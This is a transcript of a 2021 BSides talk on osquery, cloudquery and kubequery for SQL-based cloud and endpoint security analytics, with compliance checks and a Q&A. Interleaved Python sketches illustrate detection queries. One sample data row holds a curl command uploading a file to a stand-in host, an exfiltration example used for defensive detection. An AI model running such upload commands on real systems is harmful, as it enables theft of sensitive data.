JOINing Across the Stack: Structured Security Analytics for the Modern Attack Surface

BSides Las Vegas · 2021 · 43:52 · 31 views · Published 2021-08
About this talk
Eric Kaiser presents a framework for unified security analytics across cloud and endpoint infrastructure. The talk introduces osquery, kubequery, and cloudquery: tools that normalize heterogeneous cloud provider APIs, container orchestration, and endpoint telemetry into queryable SQL tables. Kaiser demonstrates practical compliance checks (S3 encryption, IAM password policies) and discusses the challenges of normalizing roughly 600 services across three public cloud APIs into a coherent security observability platform.
Original YouTube description
BG - JOINing Across the Stack: Structured Security Analytics for the modern attack surface - Mr. Eric Kaiser Breaking Ground BSidesLV 2021 - Camp Stay At Home - August 1 Video Tags: bslv2021-bg-joining_across_the_stack-1047496
Transcript [en]

this next talk is being presented by breaking ground it's joining across the stack by eric kaiser thank you welcome to structured security analytics for cloud workloads or select star for the modern attack surface my name is eric i'm a security engineer at uptycs and today we're going to talk about security analytics we'll start with a brief agenda the introduction which we're in the middle of some cloud security and visibility challenges structured telemetry what it is why it is why you might care a brief introduction to osquery a brief introduction to cloudquery and an even briefer introduction to kubequery then if all goes well i'll do a quick live demo to show you some of the things

that i talk about in this presentation and there will be a wrap up and time for q and a so who am i my name is eric i've spent about four years in infosec at this point i'm a relative newcomer i've had two or three different career paths at this point i play defense or blue team i am endpoint and cloud security engineering internal to uptycs with an os and system level security focus and in my free time i like to pretend i'm a gear head by riding and wrenching on motorcycles so let's talk about some cloud security and observability challenges from the sans 2020 cloud security survey major issues and concerns related to cloud computing

models data the single largest is visibility into and control over sensitive data processed where that is how it's managed but close behind are need for additional i.t security staff seemingly a perennial problem consistent security controls and policies and maintaining compliance another one that everyone loves mainly as we grow as the cloud grows as technology explodes we see an explosion of native services and tools to the cloud and each of those are separate silos separate data separate ways to manage look at and introspect things across amazon google azure the challenges are maintaining visibility across the hybrid and public cloud multi-cloud infrastructure since each of those providers have different apis different ways of thinking about and presenting data

according to 2021 cloud pegboard there are roughly 305 different aws services and the curve on that is really only exponential they count services by namespaces and we can see the trend of that line azure and gcp are unfortunately not much better they are growing as rapidly if not more so and each of those different services are their own silo their own data their own piece of wondering about and worrying about where is this how is this working okay so the modern attack surface is also exploding right users applications and data no longer only live on the corporate network behind the firewall behind the vpn in that safe little walled garden or

that crunchy shell with the gooey inside and observability is really needed across the whole range of cloud native ecosystems so in your infrastructure that runs your company's business or your own personal infrastructure right your workloads tend to be more dynamic more ephemeral resources are spun up and down on demand devops teams are empowered to deploy ever more rapidly right 10 or 100 deploys a day wouldn't it be nice if security could keep up if you could have some visibility into that the traditional endpoints are still there of course your hosts your virtual machines but they're in some ways at greater risk given the explosion of rolling or flexible work from home policies pandemics and new byod policies people really want

to work the way that they want to work as opposed to using an i.t issued corporate laptop identity and authorization and access management are in some ways the new firewall right the new perimeter especially with zero trust growing as a concept an idea that wants to be implemented iam is in some ways the barrier between malicious actors and the rest of all of your resources and of course applications right software as a service your sensitive data lives in the cloud somewhere it lives in office 365 or it lives in slack ideally your entire workload doesn't live in slack or all of your data but there are some pretty good wikis out there from my understanding

so all of these different pieces are combining to form this new modern attack surface right all of these present new risks new opportunities but with proper methodology hopefully they can be observed if not contained so structured security analytics is a group of tools that are designed to introspect and identify data in and across all of these different components of the attack surface osquery is the baseline of this it starts with hosts endpoints virtual machines and even container visibility next is kubequery which is container orchestration visibility to get you information about your kubernetes deployments cloudquery which is cloud provider visibility for aws gcp and azure and hopefully soon saas query and identity query to be able to

pull in and normalize data from your identity providers your saas providers office 365 g suite okta all the usual so what are or why even structured security analytics right so the first and most important benefit is being able to use your security team's existing familiarity with sql and on the flip side of that lessen the impact of unfamiliarity with the vast array of attack surface data sources right how you ask questions about an endpoint is completely unlike how you might ask questions of aws unless you have a giant logging pipeline and data normalization engine right and this allows you to structure queries similarly across heterogeneous os and cloud platforms moving on to the building blocks of this
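As a rough illustration of asking endpoint and cloud questions in the same SQL, the following sketch uses Python's built-in sqlite3 module as a stand-in for the SQL engine. The table names (cloud_instances, host_process_events), their columns, and the sample rows are hypothetical and exist only for this example; they are not the real osquery or cloudquery schemas.

```python
import sqlite3

# In-memory database standing in for normalized telemetry tables.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE cloud_instances (instance_id TEXT, image_id TEXT, launched_by TEXT);
INSERT INTO cloud_instances VALUES
    ('i-001', 'ami-trusted', 'alice'),
    ('i-002', 'ami-trusted', 'bob');

CREATE TABLE host_process_events (instance_id TEXT, username TEXT, cmdline TEXT);
INSERT INTO host_process_events VALUES
    ('i-001', 'ubuntu', 'curl -T data.csv https://upload.example.invalid/'),
    ('i-002', 'ubuntu', 'ls -la');
""")

# One JOIN links a cloud-side fact (who launched the instance)
# to a host-side fact (which command ran inside it).
suspicious = conn.execute("""
    SELECT c.launched_by, c.instance_id, p.cmdline
    FROM host_process_events AS p
    JOIN cloud_instances AS c ON c.instance_id = p.instance_id
    WHERE p.cmdline LIKE 'curl %'
""").fetchall()

for launched_by, instance_id, cmdline in suspicious:
    print(launched_by, instance_id, cmdline)
```

The point of the sketch is only the shape of the query: once both sources look like tables, the cloud side and the host side are joined on a shared key with ordinary SQL.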

osquery is a project that was open sourced by facebook in 2014 it is a project that was brought on by the linux foundation in 2019 just before querycon that year in fact it supports mac os linux and windows on the endpoint and freebsd if you really needed to and it was designed for low resource utilization it has a watchdog and if it gets out of control will sort of throttle back and normalize itself so it's not just one more agent that your users are going to dislike and the awesome thing that it did was it structured endpoint telemetry as virtual sql tables for querying so you could write things like

select star from uptime and get an idea of how long the computer had been on or select star from chrome extensions which would allow you to see all of the chrome extensions across all of the users and from there take the chrome extension ids and pivot to or join that against reputation databases some use cases right endpoint detection and response well detection osquery is read only after the fact investigation and threat hunting audit and compliance on disk it uses a data cache that is rocksdb and there's two main components to it osqueryd is the background daemon that runs scheduled queries so every 300 seconds or every 600 seconds get me the list of running

processes get me the chrome extensions that are on the computer and the other part which is osqueryi which allows you to run real-time and interactive queries osqueryd is probably the main use of osquery certainly the main use of osquery as the agent that's running scheduled queries on endpoints every so often now what you do with those you have all these wonderful results all of this wonderful telemetry what happens well you get to deliver results to various destinations you can log out to a file you can log out to a unix socket if you need the way that it was originally designed was to take all of those logs and ship them to an upstream tls

endpoint sort of a fleet manager or aggregator and that fleet manager in turn could turn around and schedule queries or update query packs across the fleet newer extensions to osquery have allowed you to deliver results to kinesis or kafka for sort of more traditional cloud logging pipelines as a way to ingest that data as one more piece from your fleet so starting with osquery starting with this idea of a binary that is turning otherwise varied or inaccessible data into normalized sql and json results is cloudquery so cloudquery is an open source extension to osquery it sort of sits alongside it released in 2021 and it was announced at osquery at scale
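The scheduled-query model described above (osqueryd running a query every 300 or 600 seconds and logging the results) can be sketched as an osquery configuration. osquery's configuration format has a top-level schedule object whose entries carry a query and an interval in seconds. The entry names running_processes and chrome_extensions below are arbitrary labels chosen for this example, and the snippet only builds and prints the JSON rather than deploying it.

```python
import json

# Entry names are arbitrary labels (assumptions for this sketch);
# `processes` and `chrome_extensions` are the osquery tables named in the talk.
osquery_config = {
    "schedule": {
        "running_processes": {
            "query": "SELECT pid, name, path FROM processes;",
            "interval": 300,  # seconds between runs
        },
        "chrome_extensions": {
            "query": "SELECT * FROM chrome_extensions;",
            "interval": 600,  # seconds between runs
        },
    }
}

# Serialize to the JSON text that would be written to a config file.
config_text = json.dumps(osquery_config, indent=2)
print(config_text)
```

Where the results go (a file, a TLS endpoint, kinesis, kafka) is a separate logger setting and is not shown in this sketch.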

and it extends the idea of sql-based analytics to cloud infrastructure currently it supports aws gcp and azure the three main public clouds with more tables being added right we started with the bare bones minimum viable product and more tables and more data sources are being added and it allows you to as with osqueryd and osqueryi run scheduled and real-time queries some use cases for that might be resource visualization right being able to ask the question of show me all of the ec2 instances show me all of the s3 buckets show me all of the iam users and from there you can monitor your current configuration compare that to your baseline expected

configuration so you can monitor drift in your aws resources over time because the queries can be scheduled and because the results can be sent somewhere saved or logged you have not only point in time data sources or investigational capability but you also have compliance capability right because you have a record of how things have been ever since you started using cloudquery so even more than that right you can detect misconfigured s3 buckets you can verify that mfa is enabled for all users you can do root cause analysis or after the fact security investigations if something has gone wrong you can again compare sort of previous cloudquery results to what might be the case or even go ask

specific questions that you weren't asking before but can in real time in the moment overall security overall compliance right being able to take all of this data from a cloud and turn that into something that is structured data we'll talk a little bit more about this as well but one of the things that you can do is ensure conformance to something like the aws cis benchmark right not only as a way to validate not only that devops is shipping not only that security controls are working but everything is secured to a minimum baseline so let's take a quick look at how telemetry provides insights using a combination of the aws cloud api and osquery running on an ec2

ami virtual machine in an aws environment so let's consider the following sequence of events a user who has iam credentials logs into an aws account and they launch an ec2 instance from a trusted ami in your environment when that boots this ec2 instance runs an ubuntu server which mounts an s3 bucket containing sensitive data the ubuntu software utilities which are running in the context of the server in the instance have access to data from the s3 bucket okay inside that instance a malicious script launched by the user whether a malicious actor or an inside job as it were invokes a curl command that curl command performs a dns lookup that dns lookup is captured by osquery

and can be joined against sources that do domain reputation domaintools for example that curl command then establishes the tcp/ip socket and again that ip address can have a reputation in a database and then finally it establishes an https tls connection which can have a ja3 or jarm reputation as well once all of that's complete the curl command exfiltrates the file from the s3 bucket and ships that off so that scenario outlines the possibilities where a malicious actor with access to credentials again however they came by them intentional or not is able to masquerade and exfiltrate information from a cloud workload right sensitive data stored in an s3 bucket trusted ami shipped off data to

elsewhere so the first part of the interactions in the above scenario which is confined to the aws api data this is where cloudquery is going to provide that relevant telemetry the telemetry includes details about the iam account used the ec2 instance details the configuration and access information about the s3 bucket where the data was stored and the cloudtrail activity which captures details about the connection with those specific iam credentials launching the ec2 instance from the trusted ami and finally that ec2 run of the ubuntu operating system the second part which is osquery running inside the ec2 instance has the ability to capture telemetry at various stages of the attack happening inside the virtual machine so the osquery process

events table has the ability to capture that a curl command has been invoked the process hierarchy in the process events table entry shows the curl command itself with arguments that the curl command was invoked by a specific user in a specific shell that was created due to an ssh login and the tty linked to the ssh login chained all the way back up to the root process manager pid one so there's a you know ancestor of an ancestor of an ancestor of an ancestor all the way back to root when the socket connection is established the process socket events table from osquery can provide the necessary information to link the reputation of the ip against

a known domain the dns events and http events tables provide additional information that can be correlated against the domain and https reputation databases the url information can be joined again against ja3 reputation databases and additionally if the file was copied to a disk or a location on disk somewhere before it was exfiltrated you can use process file events table to capture telemetry to determine if the creation of the file based on folder location or other events might be an indicator of malicious activity so with all of these pieces right beginning from the user logging in with iam credentials all the way down to the final exfiltration of the file via the curl command you can see that

with these two pieces there's the ability to track the flow of the attack from start to finish right through the entire chain of events so what can you cloud query right knowing that you can ask questions of aws this is a quarter i think a third as an example of the tables that are available in cloudquery that you can ask questions of ec2 images ec2 instances security groups volumes all of the iam groups and policies and roles and users password policies s3 buckets cloudwatch alarms ecs clusters eks clusters a lot of the data that amazon exposes kind of high level or more detailed is represented across the tables in cloudquery you can also query gcp compute disks

images networks routes vpn tunnels iam roles and service accounts just like you can in aws even gcp sql instances or storage buckets mapped to something like s3 buckets so let's take a look at a sample aws cis benchmark this is from version 1.2 which is a little old but still relevant and relates to securing s3 buckets right we want to ensure that s3 buckets are configured with block public access at the bucket level we want to ensure that all s3 buckets employ encryption at rest and we want to make sure that the bucket policy allows https requests so let's check this is a sample query for cloud query we are getting the name the status

and the region from the aws s3 bucket right when server-side encryption configuration from the s3 bucket table is not null then everything's fine encryption is configured when it is null something is wrong and then what this does is take that data and present it in a nice table format so you can see at a glance which buckets have it enabled which buckets have it disabled there's more to s3 tables than just cis benchmark compliance or even benchmark compliance period bcdr or safety right let's make sure that s3 versioning is turned on in case an accidental or malicious employee nukes files in the

bucket not only are the files there but there is a history of those files to say nothing of change control right you can go back and say okay you know it was changed on this date by this person this check just ensures that versioning status is turned on if it's turned on then great otherwise it pops a warning right something's wrong now that might not be a failure but this is a great way to again see at a glance what's happening with s3 buckets how about password compliance we can ensure that the iam password policy meets all of the requirements one uppercase letter one lowercase letter one hieroglyph that you were facing west on tuesday

when you made it that it has a minimum length of 14 or greater that it expires passwords within 90 days or less that a black cat walked under a ladder and you saw the full moon in the sky all the usual okay not trusting anybody with the wonderful new world of zero trust let's make sure not only that users have strong policies but that the policy itself is configured so if the minimum password length is set to null no password policy is set that is the gateway through which all others must pass because a policy has to be set otherwise if it's greater than or equal to 14 characters and we have set all of these other things

require lower case require uppercase et cetera et cetera then strong password policies are configured otherwise not at all this is from the aws iam account password policy table which turns all of the iam data into again a sql table you can query we'll talk a little bit more about some of those in the demo when we get to that and you can see what some of those results look like
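The two checks walked through above (S3 encryption at rest and the IAM password policy) can be approximated with SQL CASE expressions. This sketch runs them against an in-memory SQLite database from Python. The table names follow the ones spoken in the talk (aws s3 bucket, aws iam account password policy), but the exact identifiers, column names, and sample rows here are assumptions made for illustration, not the real cloudquery schema.

```python
import sqlite3

# In-memory stand-ins for the cloud tables; names and columns are assumed.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE aws_s3_bucket (
    name TEXT, region TEXT, server_side_encryption_configuration TEXT);
INSERT INTO aws_s3_bucket VALUES
    ('logs-bucket', 'us-east-1', 'AES256'),
    ('scratch-bucket', 'us-west-2', NULL);

CREATE TABLE aws_iam_account_password_policy (
    minimum_password_length INTEGER,
    require_lowercase_characters INTEGER,
    require_uppercase_characters INTEGER,
    max_password_age INTEGER);
INSERT INTO aws_iam_account_password_policy VALUES (8, 1, 1, 90);
""")

# Encryption check: a NULL configuration means encryption is not set up.
bucket_rows = conn.execute("""
    SELECT name, region,
           CASE WHEN server_side_encryption_configuration IS NOT NULL
                THEN 'encryption configured'
                ELSE 'encryption NOT configured'
           END AS status
    FROM aws_s3_bucket
    ORDER BY name
""").fetchall()

# Password policy check: NULL length means no policy at all; otherwise
# require length >= 14, both character classes, and expiry within 90 days.
policy_status = conn.execute("""
    SELECT CASE
        WHEN minimum_password_length IS NULL
            THEN 'no password policy set'
        WHEN minimum_password_length >= 14
             AND require_lowercase_characters = 1
             AND require_uppercase_characters = 1
             AND max_password_age <= 90
            THEN 'strong password policy configured'
        ELSE 'strong password policy NOT configured'
    END
    FROM aws_iam_account_password_policy
""").fetchone()[0]

for row in bucket_rows:
    print(row)
print(policy_status)
```

The sample policy row has a minimum length of 8, so it falls through to the last branch, which mirrors the demo result later in the talk where a policy exists but is shorter than 14 characters.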

all right let's talk about kubequery this is an open source extension released in 2021 announced at osquery at scale and it extends that concept of sql-based analytics to kubernetes it has support for kubernetes openshift aws eks and google cloud gke it doesn't currently support azure kubernetes but i believe that that is in development okay so the use cases there are container security at the individual and pod level monitoring configuration and security policies and again everyone's favorite compliance it is important to be aware that kubequery runs as a daemon set in kubernetes it doesn't run in each individual container that's the role for osquery in each container if desired there's a lot of prior art about osquery

in temporary containers being spun up and spun down it is still possible to get useful data out of them querycon 2019 is a good starting point for that if you want to dig further it's also important to be aware that the amount of json in sql columns that comes back from kubernetes can be quite high it is normalized a lot of it is turned into individual columns in the tables but because there is a great deal of flexibility in the data that comes back some flexibility has been left in on purpose and that's where sqlite or other sql engines json parsing can come in to turn that into columns or other data as you see the

need or see fit so there's a missing piece in all of this which is that you will probably want something upstream of all of these different osquery extensions that are running in the cloud as a daemon set in kubernetes on an ec2 aws instance running queries every so often and that is query tls so it is a very very very minimal osquery upstream tls endpoint that can be deployed in aws as a lambda function it persists log data to s3 organized by day it allows you to create rule and alert notifications using json logic and it is a very minimal bare bones logging infrastructure for cloudquery and kubequery and osquery to get you started seeing

what scheduled queries from kubequery d and cloudquery d are going to look like all right it's demo time so we talked a little bit earlier about the aws s3 bucket queries i've got a live demo environment running cloudquery let's go ahead and switch over to that and see what the queries look like so again i'm running cloudquery in a docker image it is a bundle which is how cloudquery is shipped it's the easiest way to get started you can run it in an ec2 instance with cloud permissions or ideally a credentials.json file for an aws service account we're running osqueryi to do cloudquery queries again these

are things that would normally be expected to be run as scheduled query packs by cloudquery d in the background somewhere checking on the status of these things from time to time and then shipping those logs somewhere else so it can take some time to return data which is especially why running those scheduled queries is helpful but we did get a quick result back here from the aws iam account password policy and for the purposes of this demo you can see that we do not have strong password policies they are not configured so again we do have a minimum password length set because it's not null so we didn't get the no password policy set warning

but the minimum password length is less than 14 so again for the purposes of this demo this is not a good aws security policy let's do a quick recap so cloudquery extends osquery to deliver data about cloud infrastructure in a structured format right it's taking all of the pieces of aws the pieces of gcp the pieces of your infrastructure in azure and it's turning all of that into a set of sql tables that you can ask questions of generally in real time especially again for investigative purposes kubequery does the same thing for public cloud kubernetes being able to take all of the data across all of these various different sources and stream that data as json results

to your upstream aggregator whether that's query tls whether that's kinesis or kafka whatever your upstream logging or investigation or normalization solution is you can take all of this data and ship it there you can also if you're using some kind of tls endpoint or interactive osquery turn around and ask questions of all of these different data sources across your fleet right again we talked about some of the use cases there cloud security investigation and threat hunting audit and compliance especially with the history of your results over time it or operations configuration and monitoring again telemetry powered security or structured security analytics the various different adjuncts and extensions to osquery the tool suite consisting of

osquery which is for your hosts virtual machines endpoints visibility inside containers kubequery for your container orchestration visibility and cloudquery for your cloud provider visibility ideally saas query and identity query are coming soon they are things that are being worked on to round out your ability to ask questions of all of these various data sources where do you get it i'm going to leave this up here for just a second github.com/uptycs and cloudquery kubequery and query tls again cloudquery is distributed as a docker image kubequery is a kubernetes daemon set that you can deploy and query tls is an aws lambda function

that you can use as your upstream result aggregator and now with the plethora of remaining time that i'm sure that i have i am happy to take and answer questions all right great thank you so much for that great presentation i really appreciate it you know i've asked a couple of people this question as we've gone through you know people submit these talks weeks and months before the conference happens are there any updates you'd like to give before i start going to the chat for questions a couple of pieces and thank you so much i did not manage to get the demo working

but i will drop the actual queries that i used in the chat so folks can take a look at those if they want to go play around with them to get a sense for those aws s3 queries and i will do that in just a second the other thing that i will say is that because this project is fairly new it was you know released right at the beginning of 2021 it's six or seven months old it is growing fairly rapidly we're adding new tables and new data sources pretty often even from like when i went from planning this talk to going through the cfp and all

of that i think we've almost doubled the amount of tables across all three major data sources it's certainly growing and we're trying to keep the momentum going keep putting it out there you know obviously you're up here you're giving this presentation it sounds to me like there's a lot of people behind the scenes behind the talk here do you want to talk about that for a bit yeah i surely do and i definitely don't want to take a whole lot of credit for this i am blue team at uptycs and i use this tool every day but most of the coding and all of the sort of

behind-the-scenes work was actually done by a whole crew of talented individuals over here and i want to give a big shout out to them and a thank you because this kind of work wouldn't be possible i'm just sort of the face of the project at least in this particular talk so for sure the other thing that i would say maybe as a piece of that kind of why we did this and where that came from is uptycs is an osquery company we started with osquery specifically for just the endpoints and as we've grown and as we've seen needs grow we've sort of started

using and developing tools to build on that because of the power that we've seen in structured telemetry and again i mentioned some of those in the talk the two that are hypothetical are still hypothetical i don't have anything else to add on that but we are still interested and looking forward to doing those at some point great all right you know i've been doing these interviews now for the last two days and one of the things i like to ask first it's always interesting to me for researchers you know what was the hardest part about doing this research for you so the hardest part is actually

what the project was intended to solve especially for cloudquery working with three different public cloud apis how those calls are made how being able to talk is you know three different languages right three different full apis across however like 600 different individual services and taking all of those results taking all of those requests and turning that into something that looks like a sql table or a sql database that you can actually access with those queries there's a lot of json there's a lot of other things that come back and normalizing that is hard and it's still hard there are you know we're continuing to work on it but there are times when

you'll get a table row or a column result that's entirely json because there isn't necessarily a clean way to parse that out into something that maps cleanly to just columns and rows but we like to think we're making progress oh yeah it sounds very complicated to be dealing with that many data sources so in the same vein so then you know there's hard pieces but what was surprising about this research both some of the ways i guess what i'll say is the surprising part was like how cool it was when it came together i'm not used to thinking in sql

i came to that sort of late you know i was a lot more like elasticsearch sort of unstructured data and just figuring out how to work through that in incident response or other kinds of things but being able to look at it in database form and being able to kind of join both from cloud sources and endpoints and being able to watch an attack move from you know somebody in san francisco and someone else you know who's awake across the world and through that the cloud being able to see all of those pieces connect using a single tool was very powerful it was one of my like aha

or very cool moments so why do you think no one's done this before or have they tried and failed or like so there are actually a couple of other things like this i don't know that we can claim that we're the first necessarily but we are definitely trying to do our best steampipe is another option out there that does sort of similar ideas i don't actually know if that's open source or not but it's come across my radar recently and there is actually something else called cloudquery that does things very differently under the hood that's a neo4j database

and graphs and all of the rest and that is like cloud first and cloud only and we started at the endpoint and are working our way up kind of through all of the various different pieces of the stack so it's just kind of a different directional approach nice it's the other yeah apologies for cutting you off but the thing here is being able to take we've had a lot of i've heard across all of the osquery conferences that i've been at and some of the blue team hangouts is a lot of folks love osquery it's open source it's awesome it's a

great endpoint monitoring agent and it is now old enough that there is a great deal of experience or at least you know five or six or eight years of experience with osquery and people want to take that they want to take the experience that they have they want to take the people on their teams who know how to work with it and are sort of thinking that way and move that into other areas of the attack surface in the company so speaking of enterprises you know we were talking previously about how you know i'm from the bay area and you know a lot of those companies were cloud native they grew up in the cloud

yeah you know but other legacy companies are slowly moving their infrastructure to the cloud do you think this gives them you know a leg up in terms of being able to monitor both the endpoints and the cloud stuff in one space is it going to help them centralize faster than say the companies that had to build this stuff from scratch i'd like to think so so the first piece of that is there are certainly a lot of folks in your enterprise who have sql experience right and being able to take that and how you think about getting data out of databases and

you know being able to synthesize and correlate that together being able to just take that and apply it in a new domain by virtue of this tool is very powerful and we like to think that the on-ramp is pretty short for that it does again because of the sort of direction that we're building this from workstations up you know starting with osquery and being able to look at your fleet and that's servers and laptops and workstations like you know if it runs an operating system you can put osquery on it and then being able to do the same thing with the cloud right it's one

tool for all of the things that you care about right being able to instead of this tool for endpoints and this tool for the cloud and wait that was the wrong tool and we have to go back and do it and we you know now we have two and a half tools because we're behind start with one grow from there right nice yeah so you know this is obviously this project is an open source project and we talked about earlier how you know it's not the first but it's the first way of doing this um when it comes to the blue team and sort of centralizing and normalizing this kind of how mature do you think the open source community is

when it comes to stuff like this um so i would call this sort of um late early stage right um osquery is fairly mature um this project is six months old i'm not gonna and it's a little uh a little bit older than that internally um it is one of the underpinnings of the service that uptycs offers it powers parts of our stack but

there's certainly work to be done to figure out how to not only add new data sources again just in general right like figuring out how to take data from various different clouds put that into database form there's plenty of opportunity and we welcome contributions we'd love to see you know what can be done with this in ways that we haven't even considered yet um so it's stable um but still early days so what do you see the future like what gets you excited about the future of this so the excitement for me is adding data sources that aren't necessarily traditionally uh thought of as the cloud so maybe a good example i can give is

terraform right terraform's uh an infrastructure as code tool and you can use terraform when it started it was you know use it for aws use it for spinning up resources in the cloud spin it up for gcp and terraform has turned into being able to you know plan out your entire infrastructure across all kinds of different things uh cloudflare for example you can spin up you know whole different pieces of cloudflare infrastructure in terraform even though it wasn't necessarily uh created for that and so i would love to see this sort of structured analytics approach go from not just you know this piece of the cloud or how we traditionally think about the cloud but

all of the resources that you might have in the cloud again saas identity various other resources being able to pull that all into one bucket or at least one sort of structured kind of bucket and query that no matter the data source so you gave a great presentation and we've been talking for like you know 10 12 minutes about this what you know people want to get you know really get into this what would be the three like key takeaways from this like what will be the like the most important thing that they take away from this talk yeah so uh the things that i'm excited about the things that i'd love for people

to keep in mind is um not only that osquery is out there um because it is awesome and maybe for folks who haven't considered it please do check it out but uh now it can do even more by virtue of these open source extensions you can go query your kubernetes infrastructure on public clouds get data the same way you can query your aws azure and gcp resources the same way uh and uh check out our public github repos github.com uh the links are in the slides i'll put them in the chat again if people want to uh check them out and uh pull requests welcome okay that was gonna be my next question is where can people

follow up and follow the research but um do you have a twitter handle or anything that you wanna put out there for people uh i do exist on twitter but uh i can't say that i post about this much i'm not as active as i would like to be uh github is the place to go all right well great well thank you so much uh for giving this presentation um you know breaking ground is for new and exciting research uh not just red team but also blue team so we really appreciate you sending the talk and coming and taking the time to give this talk so thank you so much thank you

so very much for having me it's been a pleasure